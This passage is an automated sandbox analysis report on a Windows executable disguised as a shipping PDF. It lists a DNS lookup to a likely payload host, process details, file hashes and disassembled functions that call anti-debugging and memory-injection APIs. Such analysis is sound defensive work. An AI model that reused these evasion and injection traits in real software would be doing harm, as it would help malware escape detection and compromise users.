Nov 27, 2020 15:50:25.283133030 CET	192.168.2.6	8.8.8.8	0x47c2	Standard query (0)	gorkaloyola.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 27, 2020 15:49:21.361706018 CET	8.8.8.8	192.168.2.6	0xea1	No error (0)	g.msn.com	g-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Nov 27, 2020 15:50:25.445837975 CET	8.8.8.8	192.168.2.6	0x47c2	No error (0)	gorkaloyola.com		192.185.170.106	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Shipping Document INVPLBL_pdf.exe PID: 7072 Parent PID: 5852

General

Start time:	15:48:21
Start date:	27/11/2020
Path:	C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe'
Imagebase:	0x400000
File size:	86016 bytes
MD5 hash:	40E23535EAEB38100848D2544F29425D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: Shipping Document INVPLBL_pdf.exe PID: 6704 Parent PID: 7072

General

Start time:	15:49:16
Start date:	27/11/2020
Path:	C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Shipping Document INVPLBL_pdf.exe'
Imagebase:	0x400000
File size:	86016 bytes
MD5 hash:	40E23535EAEB38100848D2544F29425D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Shipping Document INVPLBL_pdf.exe PID: 7072 Parent PID: 5852 Shipping Document INVPLBL_pdf.exeCOMMON

Executed Functions

Function 02324887, Relevance: 12.9, APIs: 2, Strings: 5, Instructions: 627COMMON

Download Yara Rule

Strings

ntdll, xrefs: 02324F6C
pi32, xrefs: 02324F06
TM, xrefs: 023238BD
1.!T, xrefs: 02320890
0={,, xrefs: 02324A40

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID: 0={,$1.!T$ntdll$pi32$TM
API String ID: 0-1308584630
Opcode ID: 51e195c6f7c4242d445c2ba30fa7a96e5c52ce4b0c7cec2867923bd7da41b34f
Instruction ID: 9b12146b2da98f1d950aabc007d58baf7738be0199808dbf6d4116230d92948d
Opcode Fuzzy Hash: 51e195c6f7c4242d445c2ba30fa7a96e5c52ce4b0c7cec2867923bd7da41b34f
Instruction Fuzzy Hash: 932228747403169FEF30AE28CC957EA37A7AF45740FA08115EE85A7281DB79C889CF51

Uniqueness

Uniqueness Score: -1.00%

Function 004060FE, Relevance: 10.9, APIs: 1, Strings: 6, Instructions: 402
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 57%

			E004060FE() {
				void* _t10;
				void* _t11;
				signed int _t25;
				signed int _t26;
				intOrPtr* _t33;
				unsigned int _t35;
				unsigned int _t36;
				unsigned int _t37;
				unsigned int _t38;
				unsigned int _t39;
				unsigned int _t40;
				unsigned int _t41;
				unsigned int _t42;
				unsigned int _t43;
				unsigned int _t44;
				unsigned int _t45;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t48;
				unsigned int _t49;
				unsigned int _t50;

				_t36 = _t35;
				_t37 = _t36 >> 0;
				_t11 = _t10 - 0x29;
				_t38 = _t37;
				do {
					_t39 = _t38 + 1;
					_t40 = _t39;
					_t25 =  *0x407a5c;
					_t41 = _t40 >> 0;
					_t26 = _t25 ^ _t41;
					asm("cld");
					_t38 = _t41 >> 0;
				} while (_t26 != _t11);
				asm("cld");
				_t42 = _t38;
				asm("cld");
				asm("cld");
				_t43 = _t42 >> 0;
				asm("cld");
				asm("cld");
				_t44 = _t43;
				_t45 = _t44 >> 0;
				_t33 =  *((intOrPtr*)(0x401014));
				do {
					_t46 = _t45 >> 0;
					_t47 = _t46;
					_t33 = _t33 - 1;
					asm("cld");
					asm("cld");
					_t48 = _t47 >> 0;
					asm("cld");
					_t49 = _t48;
					_t50 = _t49 >> 0;
					_t45 = _t50 >> 0;
				} while ( *_t33 != 0xffcc88ea);
				asm("out dx, eax");
				_push(ss);
				asm("cld");
				while(1) {
					asm("cld");
				}
			}

0x0040611d
0x0040613c
0x0040615e
0x00406177
0x004061de
0x004061fa
0x0040625c
0x004062d1
0x004062d3
0x0040639e
0x004063a5
0x004063f1
0x004063fe
0x00406433
0x004064a7
0x0040651d
0x00406552
0x00406559
0x004065f8
0x00406646
0x004066de
0x004066fc
0x0040676b
0x004067e1
0x004067e1
0x0040680d
0x00406820
0x004068e7
0x0040691f
0x00406990
0x00406a5f
0x00406aa4
0x00406b33
0x00406b56
0x00406b87
0x00406bb6
0x00406bb9
0x00406c9b
0x00406cce
0x00406cee
0x00406cca

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Strings

====, xrefs: 00406112
====, xrefs: 00406103
====, xrefs: 00406117
====, xrefs: 004060FE
====, xrefs: 0040610D
====, xrefs: 00406108

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: ====$====$====$====$====$====
API String ID: 4275171209-1463303214
Opcode ID: 911e26293fc988ccfef249bdabff71a8e7d00efc83b9242a32ac906c2a2eb8d9
Instruction ID: 54a447ffa01c8cf6e6b512badfdebbfaf433e82b27c20a843db148b441890c8d
Opcode Fuzzy Hash: 911e26293fc988ccfef249bdabff71a8e7d00efc83b9242a32ac906c2a2eb8d9
Instruction Fuzzy Hash: C6C138B2F4E111CBE3645A50A840B307A31AB43304FB365BB89073A5D6D77D2963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 02324046, Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 463fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,02323FB9,023240C6,02320957), ref: 0232406C

Strings

TM, xrefs: 023238BD
1.!T, xrefs: 02320890

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: CreateFile
String ID: 1.!T$TM
API String ID: 823142352-2757424881
Opcode ID: 2450da30756a502f2209b098970e77df2546ac3d4f1c69441dc37e8d96e5c7b5
Instruction ID: 5514d1abc54a4ebf03abacf5df56dc9eed80345a3b439090bdd60c33dd14b2db
Opcode Fuzzy Hash: 2450da30756a502f2209b098970e77df2546ac3d4f1c69441dc37e8d96e5c7b5
Instruction Fuzzy Hash: ECE12674780315AEFF306E28CC95BEA3667AF45710FA04125FE86AB2C1D7B984C98F11

Uniqueness

Uniqueness Score: -1.00%

Function 02320A6B, Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 690COMMON

Download Yara Rule

Strings

W.E, xrefs: 0232510A
1.!T, xrefs: 02320890

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID: W.E$1.!T
API String ID: 0-1435519016
Opcode ID: 91a16e1ed3e4234885d429378d95c57453f4f91c1fbc59e99e527a7d978a3ee4
Instruction ID: 4ccfac8ba41fa4a02146f43bcaa55b81d11eaba113fc59c8f6fc0d2ce72d115a
Opcode Fuzzy Hash: 91a16e1ed3e4234885d429378d95c57453f4f91c1fbc59e99e527a7d978a3ee4
Instruction Fuzzy Hash: 1F12CF317003769EEF346D688DD47EE336BAF52790F64012AECCA97582D765C48DCA12

Uniqueness

Uniqueness Score: -1.00%

Function 0232861B, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 247nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB
NtResumeThread.NTDLL ref: 02328C7B

Strings

1.!T, xrefs: 02320890

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: Thread$InformationResume
String ID: 1.!T
API String ID: 1221416862-3147410236
Opcode ID: bc8c6664bfbab71b2ff5f2a7356d5038c16c5a11b877cd7f8d508588b4dd2d96
Instruction ID: 8f72a68e7a76d71bc5836322c12cd0cf09a330afdb023fca08577a733572c104
Opcode Fuzzy Hash: bc8c6664bfbab71b2ff5f2a7356d5038c16c5a11b877cd7f8d508588b4dd2d96
Instruction Fuzzy Hash: 297167302053358EEF386E788CA47EB37AAAF55754F64412ADD8297981E774C4CCCA22

Uniqueness

Uniqueness Score: -1.00%

Function 0232062E, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(023206F0,?,00000000,?,?,?,?,?,?,?,02320375), ref: 023206CD
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB

Strings

1.!T, xrefs: 02320890

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: EnumInformationThreadWindows
String ID: 1.!T
API String ID: 1954852945-3147410236
Opcode ID: ab44e4907ca79345326620b63ff646effe085b518a26fe0ed866e1bcc9be1bac
Instruction ID: 777b3503af6eb3da51b6f49e628a77e9c054d6aa67d9db1915635c8fbf5af629
Opcode Fuzzy Hash: ab44e4907ca79345326620b63ff646effe085b518a26fe0ed866e1bcc9be1bac
Instruction Fuzzy Hash: E1417B307003315AEB24BA788CD5BEF27AADFA5760F600126ED56D76C0DB70C88CCA11

Uniqueness

Uniqueness Score: -1.00%

Function 02326FDD, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 315COMMON

Download Yara Rule

Strings

TM, xrefs: 023238BD

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID: TM
API String ID: 0-847983073
Opcode ID: 065b07a4251fa847e1781adca0d4838a4dc9423a7102eeb56a9dc870627f7165
Instruction ID: e91e64b6f52adf5c4447fd056c46974d56df83f66a1bfd9907fb40d151a7deb3
Opcode Fuzzy Hash: 065b07a4251fa847e1781adca0d4838a4dc9423a7102eeb56a9dc870627f7165
Instruction Fuzzy Hash: E7A14570780316AEFF311E24CC85BE93666EF45700FA48129FE85A72C1C7B984C98F15

Uniqueness

Uniqueness Score: -1.00%

Function 02326B82, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

TM, xrefs: 023238BD

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID: TM
API String ID: 0-847983073
Opcode ID: dc3fa3899352abd6beb3f17c54ad55e3c5acd64ffad6cfe8cc3454fd1291657d
Instruction ID: de74488ba4b948b50533639e5a9a6f171a6949fd5ec6e6bd87170671ee30463b
Opcode Fuzzy Hash: dc3fa3899352abd6beb3f17c54ad55e3c5acd64ffad6cfe8cc3454fd1291657d
Instruction Fuzzy Hash: 24A13671780316AEFF311E24CC85BE93666EF45704F948029FE85AB2C1C7B994C98F15

Uniqueness

Uniqueness Score: -1.00%

Function 02323A1C, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 310COMMON

Download Yara Rule

Strings

TM, xrefs: 023238BD

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID: TM
API String ID: 0-847983073
Opcode ID: 71b21fcf3eec5fe309426823ba44f8aaba94a801d84694a962f96ba7aeecf2dc
Instruction ID: 594ed2a9a7e3883aa0a59586200d33ac0dc08e73a8fdcd0c06870cc32b296b24
Opcode Fuzzy Hash: 71b21fcf3eec5fe309426823ba44f8aaba94a801d84694a962f96ba7aeecf2dc
Instruction Fuzzy Hash: 63A13470780316AEFF311E28CC85BE93666EF45704FA48129FE85AB2C1C7B994C98F15

Uniqueness

Uniqueness Score: -1.00%

Function 02323228, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 302nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,-00002000,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02323833

Strings

TM, xrefs: 023238BD

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID: TM
API String ID: 3527976591-847983073
Opcode ID: 9846b94def7b83e311f91721227954a22d6240fcb9364713e19e97792966b9f8
Instruction ID: 23c61513bf13bde617ea7e5f6c0f1f65d4d60cadf582ae0e7ce45ba9eb8391cd
Opcode Fuzzy Hash: 9846b94def7b83e311f91721227954a22d6240fcb9364713e19e97792966b9f8
Instruction Fuzzy Hash: 93A13571780316AEFF311E28CC85BE93666EF45704FA48029FE85AB2C1C7B994C98F15

Uniqueness

Uniqueness Score: -1.00%

Function 023244F9, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 273nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB

Strings

1.!T, xrefs: 02320890

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 2bdb9211ae2882575bba1de18155fbff69572e4d72e46c816e4e08f787cb92ab
Instruction ID: 867a835cf94bf234e1c2395871f8a69125fae3972af39fda3260aa2105e91eac
Opcode Fuzzy Hash: 2bdb9211ae2882575bba1de18155fbff69572e4d72e46c816e4e08f787cb92ab
Instruction Fuzzy Hash: 26814B307403669EEF306E78CD94BEE37A69F55790F904121EE8AAB5C1E771C88CCA11

Uniqueness

Uniqueness Score: -1.00%

Function 023232DC, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 266nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,-00002000,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02323833

Strings

TM, xrefs: 023238BD

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID: TM
API String ID: 3527976591-847983073
Opcode ID: 782dd4a13cfcfdb085656fcb677fb2ba2b5fad67cf79957608fb7c28a6f4a813
Instruction ID: e4cb1fc863a83a9f6cc7fb4f8ba0bb8c7e17404e2a9e54f0c6f3aaa5ab9d428d
Opcode Fuzzy Hash: 782dd4a13cfcfdb085656fcb677fb2ba2b5fad67cf79957608fb7c28a6f4a813
Instruction Fuzzy Hash: 8B91147568021AAFEF312E28CC85BE93666FF45300F948129EE85A7291D7BD84CD8F51

Uniqueness

Uniqueness Score: -1.00%

Function 0232339C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 245nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,-00002000,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02323833

Strings

TM, xrefs: 023238BD

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID: TM
API String ID: 3527976591-847983073
Opcode ID: bf4b792bab91e490e1ed3b96b00261a48a370e0e3fb3808821c9c5a232559956
Instruction ID: 881869d6ce415fc6ba308cc63f4d72b5536317946c5e6f0e0e2e4aa69362ae8f
Opcode Fuzzy Hash: bf4b792bab91e490e1ed3b96b00261a48a370e0e3fb3808821c9c5a232559956
Instruction Fuzzy Hash: 2681257478021AAFEF315E28CC85BE93666FF45304F948129EE85AB281C7BD94C98F51

Uniqueness

Uniqueness Score: -1.00%

Function 02322B0C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

1.!T, xrefs: 02320890

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID: 1.!T
API String ID: 0-3147410236
Opcode ID: 4826ca15d33ed47f2a04bdbf5793b0e9b36712b56f6dbd7f8753aad85367ad7a
Instruction ID: b240148562e121a3371ae09e94caaf239b52d5d0612dbfdfe032e0bbcaa6b1bb
Opcode Fuzzy Hash: 4826ca15d33ed47f2a04bdbf5793b0e9b36712b56f6dbd7f8753aad85367ad7a
Instruction Fuzzy Hash: A8715B70640325AEEF34BE348C99BEA33AAAF55750F504126ED869B1D1D774C8CCCA12

Uniqueness

Uniqueness Score: -1.00%

Function 023234CC, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 195nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,-00002000,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02323833

Strings

TM, xrefs: 023238BD

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID: TM
API String ID: 3527976591-847983073
Opcode ID: 83051a1c503d54f5abcbfebf88f47d40bb85a86e17907213583a92180ed4465a
Instruction ID: 5537bbc0f6ef02c1413d8bd5c80b2ca5591d6deaf684837ae7e16c3f3678d2fa
Opcode Fuzzy Hash: 83051a1c503d54f5abcbfebf88f47d40bb85a86e17907213583a92180ed4465a
Instruction Fuzzy Hash: 4D511274680219AFFF311E28CC85BE93666FB45704FA48025FEC5AB285C3B998CD8F45

Uniqueness

Uniqueness Score: -1.00%

Function 02323578, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 167nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,-00002000,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02323833

Strings

TM, xrefs: 023238BD

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID: TM
API String ID: 3527976591-847983073
Opcode ID: 25935178995629705b883fad9f88553ab855c5571480ab0f8e55c36639ce3e57
Instruction ID: 1833350f89af2713f86ad48bc57f2b0e24195518c1e7fd5f95965c0bd276d9ce
Opcode Fuzzy Hash: 25935178995629705b883fad9f88553ab855c5571480ab0f8e55c36639ce3e57
Instruction Fuzzy Hash: BC51D3746802196FEF712E28DC85BE93627FB45704FA48025FEC5AB291C7B988CD9F05

Uniqueness

Uniqueness Score: -1.00%

Function 02322F3D, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 158nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB

Strings

1.!T, xrefs: 02320890

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 89c4dbbbb7ef8ac64fde539376d998ffa23d3a20acd6f88a643977db7e9b2da0
Instruction ID: ff6923ddb3ba9bfacb578dcdd6b94d3851ebd7dfdf53b45dcf1f70e91f5a762c
Opcode Fuzzy Hash: 89c4dbbbb7ef8ac64fde539376d998ffa23d3a20acd6f88a643977db7e9b2da0
Instruction Fuzzy Hash: 724158307007229FEF34AA788CD079B37A6AF65710F904265DD96976C1E764C489CB52

Uniqueness

Uniqueness Score: -1.00%

Function 02323A80, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 150nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB

Strings

1.!T, xrefs: 02320890

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 25864fb3a6d6463b8a29bb2117df9ce2e67b9afc9cca7eebb6699fa1039aeee3
Instruction ID: 24b0ac2c2c79c2aab9f6fb7d7c0e10141b0b8a49295223e930c055968dc8b7a2
Opcode Fuzzy Hash: 25864fb3a6d6463b8a29bb2117df9ce2e67b9afc9cca7eebb6699fa1039aeee3
Instruction Fuzzy Hash: 1441AB713043755FEB24AA748CD57EF37A69F6A720FA0006BD886D7981D760C48CCB52

Uniqueness

Uniqueness Score: -1.00%

Function 02326558, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 145nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB

Strings

1.!T, xrefs: 02320890

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: eca46b3c20008f3d6acd2fd4a2f5ef1843df44b5fa6c3ad59072e6b9a3267f05
Instruction ID: 69984a0f397c58e18f2ecd05c735da593c2ccffe4b1f93da5faf4c57fd9c8795
Opcode Fuzzy Hash: eca46b3c20008f3d6acd2fd4a2f5ef1843df44b5fa6c3ad59072e6b9a3267f05
Instruction Fuzzy Hash: D24147707003259AEF347A788CD27DF37ABAFA9760FA00125ED4697581E774C88CCA51

Uniqueness

Uniqueness Score: -1.00%

Function 02324018, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 140nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 02324046: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,02323FB9,023240C6,02320957), ref: 0232406C

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB

Strings

1.!T, xrefs: 02320890

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: CreateFileInformationThread
String ID: 1.!T
API String ID: 2580995559-3147410236
Opcode ID: 64acd7ccb142cf226ec8d612dd30dfef4e9a20899e7edf4362ebe83dd3a881b6
Instruction ID: 56362f08d892c2f1a50e4d575fc4383bf7c5957bb23087dc959ef8aca770b901
Opcode Fuzzy Hash: 64acd7ccb142cf226ec8d612dd30dfef4e9a20899e7edf4362ebe83dd3a881b6
Instruction Fuzzy Hash: B24147717003355AEF347A788CD67EF36AA9FA5B60FA00126ED5297580E775C48CCA12

Uniqueness

Uniqueness Score: -1.00%

Function 0232361C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 139nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,-00002000,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02323833

Strings

TM, xrefs: 023238BD

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID: TM
API String ID: 3527976591-847983073
Opcode ID: fb50ca4315ffc69220c94d05b1e6e75217425f3bd42ec470f511d3048c1f4924
Instruction ID: 44efe2d0010ec2cf185fd49ac0105fbd85d93813fb5663b4959340e7db826548
Opcode Fuzzy Hash: fb50ca4315ffc69220c94d05b1e6e75217425f3bd42ec470f511d3048c1f4924
Instruction Fuzzy Hash: 104113746802196FEF362E28CC85BE83667FB05304F948065FEC5A7291C7B988CD9F05

Uniqueness

Uniqueness Score: -1.00%

Function 02322CC0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 135nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB

Strings

1.!T, xrefs: 02320890

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 87055c8dbde9f43021f93ad67dd4567e07f8730e912448a100346f9271687d02
Instruction ID: 8ec0ab3a1ae4d338765161d3936f9a7986a0a762c8d388ef61da7b814d9c8cc6
Opcode Fuzzy Hash: 87055c8dbde9f43021f93ad67dd4567e07f8730e912448a100346f9271687d02
Instruction Fuzzy Hash: 81314C703403359AFF347A784CD6BEF26A69FA5B50F600126FD569B5C1D7A0C48CCA12

Uniqueness

Uniqueness Score: -1.00%

Function 02322D64, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

1.!T, xrefs: 02320890

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID:
String ID: 1.!T
API String ID: 0-3147410236
Opcode ID: 405657b0c918320fcc439a95ee2104c52c41fc2bceead2398608dc33c0eddadd
Instruction ID: 215ad2c5fc1eb24ea5a3162fada24514e62ca5b683f5ac73b451fcd06156331f
Opcode Fuzzy Hash: 405657b0c918320fcc439a95ee2104c52c41fc2bceead2398608dc33c0eddadd
Instruction Fuzzy Hash: 183145707003359AEF347AB88CD57EF33A69FA9760F600122ED56975C1E6B0C48CCA02

Uniqueness

Uniqueness Score: -1.00%

Function 02320709, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB

Strings

1.!T, xrefs: 02320890

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 74111aa92da561cab2674bd0426436e97d77dbcdca7aa0cabe87bb558b25435e
Instruction ID: 6c7cd6d1eabe6e7b6fbb99f1b2450ba67b31af5419f261d44691722f252da918
Opcode Fuzzy Hash: 74111aa92da561cab2674bd0426436e97d77dbcdca7aa0cabe87bb558b25435e
Instruction Fuzzy Hash: B5316B703003359AEB34BA784CD57EF27AA9FA5B60F600122ED56975C0D770C48CCA01

Uniqueness

Uniqueness Score: -1.00%

Function 02320758, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB

Strings

1.!T, xrefs: 02320890

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 501c901beb1bd0af9540f25c4567e268306f24a574c4f0c8cffa531f72f6de8b
Instruction ID: de7cdc29c489581141f17803da57bcba200bc991d1f952861b6290c5e79aeee7
Opcode Fuzzy Hash: 501c901beb1bd0af9540f25c4567e268306f24a574c4f0c8cffa531f72f6de8b
Instruction Fuzzy Hash: B33168307003359AEB34BA788CD679F22AA9FA4B10F600132E95697580D761C48CCA42

Uniqueness

Uniqueness Score: -1.00%

Function 023207AC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB

Strings

1.!T, xrefs: 02320890

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 230064e7e2a192f9e32e4a47aff15df2c1f25c0c9a0e402c17a4d48fad703fc0
Instruction ID: f85c5e9e338b62112a0c417dd5b36f3f1a60ab1ad98a5513d5c18951af4d159e
Opcode Fuzzy Hash: 230064e7e2a192f9e32e4a47aff15df2c1f25c0c9a0e402c17a4d48fad703fc0
